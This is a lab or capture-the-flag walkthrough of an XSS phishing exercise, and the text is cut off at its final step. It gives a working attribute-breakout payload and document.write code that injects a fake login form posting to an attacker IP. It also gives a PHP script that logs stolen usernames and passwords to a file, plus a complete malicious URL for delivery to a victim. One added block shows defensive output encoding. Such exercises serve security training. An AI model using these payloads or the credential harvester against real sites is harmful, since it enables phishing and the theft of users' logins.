Phishing

Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to log in to '/phishing/login.php' and obtain the flag.

In many online forums and web applications, user-supplied content (such as an avatar or image URL) can be abused to change how a page is displayed through Cross-Site Scripting (XSS). XSS is a security vulnerability that allows an attacker to inject malicious scripts into web pages viewed by other users. When we submit a basic XSS payload into such a field, it often does not execute as expected, and the page instead shows a broken-image icon. This is a common issue when the input is placed inside an existing HTML tag, or when the application has security measures in place to prevent such injections.

Step 1: Understanding the Target Application

  1. Identify the Input Field: Locate the input field where user input is accepted (e.g., an image URL input).

  2. Analyze the Output: Use browser developer tools (F12) to inspect how your input is rendered in the HTML. Submitting the value test produces the following page source:

<html lang="en">
<body style="background-color: #141d2b; font-family: sans-serif; color: white;">
    <!-- --SNIP-- -->
    <img src='test'>
</body>
</html>

Step 2: Initial Payload Testing

  1. Basic XSS Payload: Start with a simple payload:

<script>alert(1);</script>
  • Input this into the image URL field and submit.

  • If the alert box appears, you have confirmed an XSS vulnerability.

  2. Check for Output Encoding: If the payload does not execute, check whether the page source shows HTML entities (e.g., &lt; for <), which means the input is being encoded before it is rendered.

Step 3: Crafting a Working Payload

  1. Bypass Filters: If basic payloads are blocked, try variations:

    • Use alternative tags or attributes;

    • Incorporate Special Characters: since the input lands inside a single-quoted src attribute, a leading '> closes the attribute and the img tag so that the rest of the payload is rendered as HTML:

'><script>alert(1);</script>
  2. Inspecting the HTML Output: After submitting your payload, view the page source to see how your input is rendered.
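The breakout above works only because the image URL is concatenated into the src attribute unencoded. As an added example (not code from the original exercise or the lab server), the JavaScript below contrasts that naive sink with a hardened one that parses the URL, accepts only http(s) schemes and attribute-encodes the value, and it checks both against the payload from this step; all function names are made up for the illustration.

```javascript
// Added example, not part of the original exercise: rendering the image
// URL sink at '/phishing' so that the "'>" breakout no longer works.

// Naive sink, equivalent to what the page source in Step 1 shows: the raw
// input is dropped inside a single-quoted src attribute.
function renderNaive(url) {
  return "<img src='" + url + "'>";
}

// Encode every character that can terminate an attribute or start a tag.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened sink: only absolute http(s) URLs that parse are accepted, and
// the value is attribute-encoded before being placed in a double-quoted
// src. Returns null when the input is rejected so the caller can show an
// error message instead of echoing the input back into the page.
function renderSafe(url) {
  let parsed;
  try {
    parsed = new URL(url); // throws on relative or malformed input
  } catch (e) {
    return null;
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    return null; // rejects javascript:, data: and similar schemes
  }
  return '<img src="' + escapeAttr(parsed.href) + '">';
}

// Does a rendered fragment contain a live script tag?
function containsScriptTag(html) {
  return /<script/i.test(html);
}

// Constructed sample input: the breakout payload from Step 3.
const breakoutPayload = "'><script>alert(1);</script>";
```

The naive sink turns the payload into a real script tag, while the hardened sink rejects it outright and still renders ordinary image URLs.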

Step 4: Developing the Phishing Payload

  1. Create a Login Form: Use document.write() to inject the phishing form:

document.write('<h3>Please login to continue</h3><form action=http://YOUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
  2. Remove Existing Elements: To make the phishing form more convincing, remove the original input field:

document.getElementById('urlform').remove();
  3. Combine the Code: Your final payload might look like this:

document.write('<h3>Please login to continue</h3><form action=http://YOUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove()

Step 5: Setting Up the Listener

  1. Using PHP: Create a PHP script to log the credentials:

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://YOUR_SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>
  • Save this as index.php and run a PHP server:

sudo php -S 0.0.0.0:80

Step 6: Executing the Attack

  1. Craft the Malicious URL: Combine the target URL with your payload:

http://YOUR_SERVER_IP/phishing/index.php?url='><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.32><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove()</script>;<!--
  2. Send the URL: Visit '/phishing/send.php' on the target server and submit the malicious URL so that it is delivered to the victim.

  3. Capture Credentials: When the victim logs in, their credentials will be sent to your server, and you can check creds.txt for the captured information.

Step 7: Test the Captured Credentials

  1. Go to http://SERVER_IP/phishing/login.php and enter the captured credentials to retrieve the flag:
